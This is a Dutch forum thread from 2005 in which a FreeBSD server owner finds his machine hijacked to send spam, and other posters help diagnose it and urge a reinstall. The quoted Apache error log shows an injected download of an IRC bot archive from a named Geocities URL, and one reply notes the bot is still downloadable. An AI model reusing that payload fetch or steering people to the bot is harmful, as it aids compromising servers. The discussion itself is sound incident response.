[FreeBSD] wordt misbruikt om te spammen - Linux en overige clients

dinsdag 5 april 2005 20:55

Acties:

hmmz

Topicstarter

Ik ben er achter gekomen dat mijn FreeBSD bak wordt gebruikt om spam te versturen. De machine draait onder andere Apache 2.0.49.

code:

ps auxww

levert (opgeschoond) het volgende resultaat

code:

USER     PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
www    22361 18.5  1.0  3172 2668  ??  R    12:11AM 241:13.98 sh -i (perl)
www    22362 18.5  1.0  3172 2664  ??  R    12:11AM 241:03.82 sh -i (perl)
www    12090 18.6  1.0  3172 2628  ??  R    Sat02PM 1377:47.29 sh -i (perl)
www     4811 18.9  1.0  3176 2664  ??  R    Thu09PM 2576:28.19 sh -i (perl)
www    12554 19.1  1.0  3172 2604  ??  R    10Mar05 31078:03.06 /usr/local/apache/bin/httpd -DSSL (perl)
www    22353  0.0  1.0  3176 2652  ??  I    12:11AM   0:00.00 sh -i (perl)
www    22354  0.0  1.0  3172 2640  ??  I    12:11AM   0:00.00 sh -i (perl)
www    22794  0.0  0.9  6968 2244  ??  I     2:18AM   0:00.03 /usr/local/sbin/httpd -k start
www    22799  0.0  0.9  7084 2352  ??  I     2:23AM   0:00.03 /usr/local/sbin/httpd -k start
www    22833  0.0  1.9  8932 4976  ??  I     2:38AM   0:00.34 /usr/local/sbin/httpd -k start
www    22866  0.0  0.9  6968 2232  ??  I     2:53AM   0:00.03 /usr/local/sbin/httpd -k start
www    22870  0.0  1.3  7116 3264  ??  I     2:56AM   0:00.10 /usr/local/sbin/httpd -k start
www    23445  0.0  0.9  6968 2232  ??  I     4:38AM   0:00.04 /usr/local/sbin/httpd -k start
www    24818  0.0  0.9  6968 2252  ??  I     2:11PM   0:00.02 /usr/local/sbin/httpd -k start
www    24821  0.0  0.9  6976 2216  ??  I     2:11PM   0:00.01 /usr/local/sbin/httpd -k start
www    24822  0.0  0.9  6968 2196  ??  I     2:11PM   0:00.01 /usr/local/sbin/httpd -k start
root   25548  0.0  0.6  4660 1636  ??  I     4:03PM   0:00.06 /usr/local/sbin/smbd -D
root   47528  0.0  1.3  4164 3256  ??  S     6:13PM   0:05.79 sendmail: ./j35ETh03026786 dell-pe2400.kode.net.: user open (sendmail)
www    49971  0.0  1.2  3420 2988  ??  S     6:38PM   0:00.08 sh -i (perl)
root   50653  0.0  1.2  4108 3148  ??  I     6:43PM   0:05.07 sendmail: ./j35EiqNX029206 vapower.com.: user open (sendmail)
root   57284  0.0  1.1  3772 2920  ??  I     7:13PM   0:03.14 sendmail: ./j35G6BlU046836 b.mx.softhome.net.: client greeting (sendmail)
root   62903  0.0  1.1  3760 2888  ??  S     7:43PM   0:03.30 sendmail: ./j35HDaLl057243 dataper.com.: user open (sendmail)
root   69538  0.0  1.1  3620 2724  ??  I     8:13PM   0:01.67 sendmail: ./j35Hv40S064858 smtp.fc.hp.com.: user open (sendmail)
smmsp  69539  0.0  0.6  3104 1608  ??  S     8:13PM   0:00.23 sendmail: ./j35FI0n8036078 from queue (sendmail)

Ik kom er alleen zo snel niet uit aan welke vulnerability ik ten prooi ben gevallen

Wat is nu eigenlijk de beste weg om dit op te lossen?

dinsdag 5 april 2005 21:04

Acties:

scorpie

Supra Addict

http://www.securityfocus.com/bid/12993

Deze misschien?

edit: mjah, weet niet of je misschien users op je bak hebt..
Enne.. als je echt geroot bent zou ik die bak niet meer vertrouwen en opnieuw beginnen (backdoors ofzo trace je nooit allemaal 100% zeker weten).

[ Voor 65% gewijzigd door scorpie op 05-04-2005 21:05 ]

wil een Toyota Supra mkIV!!!!! | wil een Yamaha YZF-R{1,6} | wil stiekem ook een Ducati
"Security is just a state of mind"
PSN: scorpie | Diablo 3: scorpie#2470

dinsdag 5 april 2005 21:07

Acties:

Verwijderd

Leuk dat je opgeeft dat je apache draait. Maar dat heeft niks te maken met het versturen van spam.

Hoogst waarschijnlijk heb je last van een open smtp relay. En als ik zo je ps bekijk. Heb je sendmail draaien.

Je zult deze tijdelijk moeten plat gooien en de config aanpassen . Of postfix gaan draaien deze is standaard al redelijk beveiligd tegen dit soort misbruik.

Ben verder niet bekend met sendmail. Dus kan je er verder weinig over melden. Ik raad aan om even te googlen naar spam protection voor sendmail of zo.

dinsdag 5 april 2005 21:12

Acties:

wizl

hmmz

Topicstarter

Verwijderd schreef op dinsdag 05 april 2005 @ 21:07:
Leuk dat je opgeeft dat je apache draait. Maar dat heeft niks te maken met het versturen van spam.

Ja vooral omdat de user www, interactive shells heeft gestart (sh -i)
Een open-relay is het zeker weten niet. Toch bedankt voor het meedenken

In de httpd-error-log tref ik nu deze dingen aan

code:

[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] --17:30:49--  http://www.geocities.com/gabitu46/bot.tar.gz
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]            => `bot.tar.gz'
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] Resolving www.geocities.com... done.
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] Connecting to www.geocities.com[66.218.77.68]:80... connected.
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] HTTP request sent, awaiting response... 200 OK
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] Length: 791,452 [application/x-gzip]
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]     0K .......... .......... .......... .......... ..........  6%   67.02 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]    50K .......... .......... .......... .......... .......... 12%  235.85 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   100K .......... .......... .......... .......... .......... 19%  282.49 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   150K .......... .......... .......... .......... .......... 25%  289.02 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   200K .......... .......... .......... .......... .......... 32%  284.09 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   250K .......... .......... .......... .......... .......... 38%  284.09 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   300K .......... .......... .......... .......... .......... 45%  299.40 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   350K .......... .......... .......... .......... .......... 51%  458.72 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   400K .......... .......... .......... .......... .......... 58%  316.46 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   450K .......... .......... .......... .......... .......... 64%  285.71 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   500K .......... .......... .......... .......... .......... 71%  289.02 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   550K .......... .......... .......... .......... .......... 77%  292.40 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   600K .......... .......... .......... .......... .......... 84%  287.36 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   650K .......... .......... .......... .......... .......... 90%  287.36 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   700K .......... .......... .......... .......... .......... 97%  328.95 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]   750K .......... .......... ..                              100%  388.18 KB/s
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234]
[Fri Apr 01 17:30:53 2005] [error] [client 64.179.75.234] 17:30:53 (243.66 KB/s) - `bot.tar.gz' saved [791452/791452]

dinsdag 5 april 2005 21:12

Acties:

Verwijderd

Hoogst waarschijnlijk heb je last van een open smtp relay.

Je kan testen of je open relay hebt door ff te telnetten naar

code:

1	relay-test.mail-abuse.org

dinsdag 5 april 2005 21:45

Acties:

Kees

Serveradmin / BOFH / DoC

Tuurlijk heb je geen open smtp.
wel heb je een groot aantal exploits op je bak draaien en bots zo te zien aan je ps. ik zou de server opnieuw instaleren, eventueel eerst naar rootkits zoeken, en je tmp doorspitten op logs en trojan horses.

Sendmail wordt welg ebruikt om de troep te versturen, maar je hebt toch overduidelijk een aantal gekke dingen erop draaien die niet door jou geinstaleleerd zijn (mag ik hopen). Sendmail is uiteraard een 'open' relay vanaf localhost.

[ Voor 33% gewijzigd door Kees op 05-04-2005 21:46 ]

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

dinsdag 5 april 2005 21:55

Acties:

Jimbolino

troep.com

mayb een of ander (php/cgi) script dat de user-input niet goed afvangt... lijkt erop alsof er nu een shell draait via je http...

dus tijdens de reinstall ook ff al je (zelfgemaakte) scripts nalopen...

[ Voor 26% gewijzigd door Jimbolino op 05-04-2005 21:59 ]

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

dinsdag 5 april 2005 23:17

Acties:

Zwerver

Mjah, en als je wat extra info wil hebben? System state zoals die nu is netjes backuppen en dan wat gaan spitten, je kan daar leuke info uitkrijgen en eventueel wil ik je wel ff helpen met zoeken

Woonachtig Down Under. Ik negeer je insults niet, maar tegen de tijd dat ik ze lees zijn ze meestal niet relevant meer

dinsdag 5 april 2005 23:21

Acties:

wizl

hmmz

Topicstarter

Zwerver schreef op dinsdag 05 april 2005 @ 23:17:
Mjah, en als je wat extra info wil hebben? System state zoals die nu is netjes backuppen en dan wat gaan spitten, je kan daar leuke info uitkrijgen en eventueel wil ik je wel ff helpen met zoeken

De system state backuppen, wat bedoel je daar precies mee? Ik heb voor nu in ieder geval

code:

1	ifconfig xl1 down

gedaan, zodat eventueel (ahem) verkeer er niet uit kan

woensdag 6 april 2005 09:57

Acties:

wizl

hmmz

Topicstarter

http://www.idefense.com/a...=185&type=vulnerabilities

Dat is de oorzaak van het probleem in ieder geval

woensdag 6 april 2005 10:31

Acties:

TrailBlazer

Karnemelk FTW

die bot staat nog steeds op de geocities website (net gedownload) Mag dat wel op GoT zo'n link. In die file zit een config bestand mech.set waar de defaults in staan. Eventueel kan je even op jouw systeem kijken naar welke IRC server/channel die BOT connect.

wizl schreef op woensdag 06 april 2005 @ 09:57:
http://www.idefense.com/a...=185&type=vulnerabilities

Dat is de oorzaak van het probleem in ieder geval

weet je vanaf welk ip dat ding erop gezet is. Grote kans dat het een anonymous proxy is maar toch ben je weer wat verder.

trouwens grapig gisteren probeerde iemand ook deze exploit te gebruiken bij mij

[ Voor 48% gewijzigd door TrailBlazer op 06-04-2005 10:42 ]

woensdag 6 april 2005 11:29

Acties:

Zwerver

Gewoon je hele systeem backuppen, ergens intern installeren waar het niet met het internet kan connecten en dan eens ff goed door je systeem heen gaan. Dit systeem zul je hoe dan ook moeten herinstalleren je weet immers nooit wat er allemaal nog meer opstaat. Als je wil mag je mij wel een kopie doen vanaf een snelle server zodat ik even mee kan kijken, maar het systeem zelf is helemaal verloren helaas.

edit:

Overigens zou je het risico kunnen nemen om door te draaien met dit systeem, omdat het (wat blaataaps me net terecht op irc zei) er naar uitziet dat het alleen je www-user is die gepakt is. Hou er wel rekening mee dat je op deze manier nooit 100% zeker bent dat er niet meer gebeurd is op je systeem en dat ik persoonlijk nog steeds vind dat je eigenlijk moet herinstalleren

[ Voor 32% gewijzigd door Zwerver op 06-04-2005 11:37 ]

Woonachtig Down Under. Ik negeer je insults niet, maar tegen de tijd dat ik ze lees zijn ze meestal niet relevant meer